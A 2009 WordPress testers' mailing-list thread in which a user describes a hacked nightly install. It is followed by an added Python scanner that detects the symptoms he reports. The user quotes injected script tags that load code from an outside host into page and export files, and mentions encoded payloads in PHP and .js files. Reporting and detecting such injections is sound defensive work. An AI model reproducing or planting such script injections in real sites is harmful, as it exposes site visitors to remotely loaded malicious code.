[wp-testers] 2.8.6 Beta1

Naudirz naudirz at gmail.com
Fri Nov 20 09:24:23 UTC 2009


Servers are talkactive.net

Links are inserted in a lot of .php and .html files, for example like this:
<link rel='index' title='My site' href='http:/ <http://nadox.se/>/
removed.com' />  </head><script src=
http://northstarsocal.com/testpage/contact.php ></script> <body>

Also encoded 64 text. I'll upload it for you to see (check at the top of the
attached php files).

Also, even when I do an export from the admin panel, I get this in the XML file:

<script src=http://northstarsocal.com/testpage/contact.php ></script><?xml
version="1.0" encoding="UTF-8"?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an
export of your blog. -->


I first found inserts of "gimgoszczanow.pl" at the bottom of .js files.


On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:

> What are the symptoms of the hack?
>
> Install something to log all post requests ASAP, to gather data if it's a
> new vulnerability: http://www.village-idiot.org/post-logger
>
> You'd not by any chance be on MediaTemple servers would you? *(Who's your
> webhost)
>
>
> On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <naudirz at gmail.com> wrote:
>
>> OK, cause my 2.9 nightly gets hacked every day..
>> in that case it's a new security bug..
>> I've wasted every file/folder and done a fresh installation, everything
>> except the db is new, also passwd is changed on everything except db.
>> No extra user is in db.
>>
>>
>>
>> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:
>>
>>> Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
>>>
>>>
>>>
>>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <naudirz at gmail.com> wrote:
>>>
>>>> Hi!
>>>>
>>>> Is this fix also in 2.9 nightly build?
>>>>
>>>> /Phibrz
>>>>
>>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <ryan at boren.nu> wrote:
>>>>
>>>>> http://wordpress.org/wordpress-2.8.6-beta1.zip
>>>>>
>>>>> Fixes these two security issues:
>>>>>
>>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
>>>>>
>>>>> A logged in user with author privileges is required to exploit.  Press
>>>>> This and uploads need testing.
>>>>> _______________________________________________
>>>>> wp-testers mailing list
>>>>> wp-testers at lists.automattic.com
>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>
>>> --
>>> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/
>>>
>
>
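
One way to check a web root for the symptoms described in this thread (a script tag between </head> and <body>, content ahead of the XML declaration in an export, encoded text at the top of PHP files, foreign hosts at the bottom of .js files), added here as an example and not code from the thread or from WordPress. The rule names, the 80-character and 2 KB thresholds, the five-line tail window and the `injected.example` host are assumptions.

```python
import re
from pathlib import Path

# <script src=...>, quoted or unquoted, capturing the URL.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*['\"]?([^\s'\">]+)", re.I)
# Whatever sits between </head> and <body>; normally only whitespace.
HEAD_BODY_GAP = re.compile(r"</head\s*>(.*?)<body\b", re.I | re.S)
# Heuristic: an unbroken base64-alphabet run of 80+ characters.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
EXTS = (".php", ".html", ".htm", ".js", ".xml")

def scan_text(name, text, own_hosts=()):
    """Return (rule, evidence) pairs for one file's contents."""
    findings = []
    suffix = Path(name).suffix.lower()
    if suffix == ".xml":
        # An export must start with the XML declaration (a BOM is allowed).
        pos = text.find("<?xml")
        prefix = text[:pos].lstrip("\ufeff").strip() if pos > 0 else ""
        if prefix:
            findings.append(("content-before-xml-declaration", prefix))
    if suffix in (".php", ".html", ".htm"):
        for gap in HEAD_BODY_GAP.findall(text):
            findings += [("script-between-head-and-body", s) for s in SCRIPT_SRC.findall(gap)]
    if suffix == ".php":
        m = B64_RUN.search(text[:2048])  # only the top of the file
        if m:
            findings.append(("base64-run-at-top-of-php", m.group(0)[:40]))
    if suffix == ".js":
        # Hosts referenced in the last five lines that are not the site's own.
        for host in HOST.findall("\n".join(text.splitlines()[-5:])):
            if host.lower() not in own_hosts:
                findings.append(("foreign-host-at-end-of-js", host.lower()))
    return findings

def scan_tree(root, own_hosts=()):
    """Walk a web root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTS:
            text = path.read_text(encoding="utf-8", errors="replace")
            found = scan_text(path.name, text, own_hosts)
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples modelled on the snippets in the post (placeholder host).
SAMPLES = {
    "header.php": "<head></head><script src=http://injected.example/c.php ></script> <body>",
    "export.xml": '<script src=http://injected.example/c.php ></script><?xml version="1.0"?>',
}
```

Call `scan_tree("/path/to/webroot", own_hosts=("your.site",))` and review each hit by hand; the base64 and .js rules are heuristics and can flag legitimate files.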

